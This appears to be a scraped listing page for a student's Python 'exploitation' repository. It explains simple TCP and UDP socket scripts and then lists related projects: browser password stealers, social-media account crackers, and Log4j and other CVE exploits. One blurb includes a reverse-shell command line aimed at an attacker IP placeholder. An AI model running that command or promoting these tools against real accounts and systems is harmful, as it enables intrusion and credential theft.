This is a repository filled with scripts that were made with Python, and designed to exploit computer systems.

Related tags

Security related resourcesPYTHON-EXPLOITATION
Overview

PYTHON-EXPLOITATION

This is a repository filled with scripts that were made with Python, and designed to exploit computer systems.

Networking

tcp_clinet.py

The tcp_clinet.py script is used to push data to a server in the event that you are not able to use the typical networking tools. In the script we:

  • Create a socket object (line 8): the AF_INET parameter indicates we will use a standard IPv4 address or hostname, and SOCK_STREAM indicates that this will be a TCP client.
  • Connect to the client server (line 11): note that, since we are using a TCP client, we must first connect to our server (via the TCP handshake) to send data to it.
  • Send the server some data in bytes (line 14)
  • Recieve data back from the server and print out the response (line 17)

    Note that this script makes numerous assumptions about the server we are engaging with:

  • It assumes that our connection will always succeed as it does not have a fallback function in the event that the server rejects our connection.
  • It assumes that the server expects us to send data first. Sometimes, the server will want to send us data first - this is especially true if the server is being guarded by a firewall of some kind.
  • The script assumes that the server will always return data to us in a timely fashion.

    The assumptions are made for simplicity's sake. All things considered, sometimes less is more.

    udp_client.py

    Our udp_client.py script is much different from our tcp script, only that it it configured to send data via the user datagram protocol (but that much was obvious):

    • We change the socket type to SOCK_DGRAM to indicate that we will be using sending data via the UDP (line 6).
    • Also, notice that there is no connect() method beforehand, since we do not need to connect to a server beforehand using UDP. This is because UDP is a connectionaless protocol.
    • The last step is to call the recvfrom() method to receive UDP data back. This returns both the data and the details of the remote host and port (line 9).

    tcp_server.py

    The tcp_server.py is just that, a multi-threaded python TCP server that we can use in the event we want to write a command shell or craft a proxy.

    • Firstly, we pass in the IP address and port we want the server to listen on (line 9).
    • Next, we tell the server to simply start listening with a max backlog of connections set to 5 (line 10). Now ther server waits for a connection.
    • Once the clinet connects, we get the client socket in the client variable and the remote connection details in teh address variable.
    • We tehn start the thread to handle the client connection (line 17).
    • The handle_client function performs rec() and then sens a simple message back to the client.
    • Owner
    Nathan Galindo
    Hi, my name is Nathan Galindo and I am a cybersecurity student at Baylor University!
    Nathan Galindo
    GitHub Repository
    Chromepass - Hacking Chrome Saved Passwords

    Chromepass - Hacking Chrome Saved Passwords and Cookies View Demo · Report Bug · Request Feature Table of Contents About the Project AV Detection Gett

    darkArp 622 Jan 04, 2023
    Facebook Fast Cracking Tool With Python

    Pro-Crack Facebook Fast Cracking Tool This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly Installation On Te

    ReD H4CkeR 5 Feb 19, 2022
    A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

    log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs. Fuzzing for more

    Duc Linh Nguyen 4 Aug 08, 2022
    Open source vulnerability DB and triage service.

    OSV - Open Source Vulnerabilities OSV is a vulnerability database and triage infrastructure for open source projects aimed at helping both open source

    Google 893 Jan 04, 2023
    Scan Site - Tools For Scanning Any Site and Get Site Information

    Site Scanner Tools For Scanning Any Site and Get Site Information Example Require - pip install colorama - pip install requests How To Use Download Th

    NumeX 5 Mar 19, 2022
    Implementation of an attack on a tropical algebra discrete logarithm based protocol

    Implementation of an attack on a tropical algebra discrete logarithm based protocol This code implements the attack detailed in the paper: On the trop

    3 Dec 30, 2021
    AttractionFinder - 2022 State Qualified FBLA Attraction Finder Application

    Attraction Finder Developers: Riyon Praveen, Aaron Bijoy, & Yash Vora How It Wor

    $ky 2 Feb 09, 2022
    Phoenix Framework is an environment for writing, testing and using exploit code.

    Phoenix-Framework Phoenix Framework is an environment for writing, testing and using exploit code. 🖼 Screenshots 🎪 Community PwnWiki Forums 🔑 Licen

    Felix 42 Aug 09, 2022
    CVE 2020-14871 Solaris exploit

    CVE 2020-14871 Solaris exploit This is a basic ROP based exploit for CVE 2020-14871. CVE 2020-14871 is a vulnerability in Sun Solaris systems. The act

    Robin Massink 2 Oct 25, 2022
    A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)

    CVE-2021-44228 – Log4j RCE Unauthenticated About This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228). This vulnerability

    Pedro Havay 20 Nov 11, 2022
    The backend part of the simple password manager project made for the creative challenge.

    SimplePasswordManagerBackend The backend part of the simple password manager project. Your task will be to showcase your creativity on our channel by

    The Coding Jungle 5 Dec 28, 2021
    Log4j2 CVE-2021-44228 revshell

    Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

    FaisalFs 16 Mar 24, 2022
    A simple way to store your passwords without requiring third party applications

    SimplePasswordManager A simple way to store your passwords without requiring third party applications Simple To Use. Store Your Passwords For Each Web

    Leone Odinga 1 Dec 23, 2021
    GitHub Advance Security Compliance Action

    advanced-security-compliance This Action was designed to allow users to configure their Risk threshold for security issues reported by GitHub Code Sca

    Mathew Payne 121 Dec 14, 2022
    Small python script to look for common vulnerabilities on SMTP server.

    BrokenSMTP BrokenSMTP is a python3 BugBounty/Pentesting tool to look for common vulnerabilities on SMTP server. Supported Vulnerability : Spoofing - T

    39 Dec 16, 2022
    Cloud One Container Security Runtime Events Forwarder

    Example on how to query events by a RESTful API, compose CEF event format and send the events to an UDP receiver.

    Markus Winkler 3 Feb 10, 2022
    A simple python script for hosting a Snowflake Proxy in your python program or with it's standalone cli

    snowflake-cli Snowflake is a system to defeat internet censorship, made by Tor Project. The system works by volunteers who run the snowflake extension

    Guilherme Paixão 6 Jul 14, 2022
    Guess the password for Tik Tok accounts

    Guess the password for Tik Tok accounts Tool features : You don't need proxies There is no captcha Running on a private api Combo T

    32 Dec 25, 2022
    Strapi Framework Vulnerable to Remote Code Execution

    CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

    Dasith Vidanage 7 Mar 08, 2022
    Check for breached passwords with k-anonymity

    passwnd Check for breached passwords with k-anonymity Usage To get prompted to enter the password securely, simply run: passwnd.py Alternatively, you

    Nat 1 Feb 08, 2022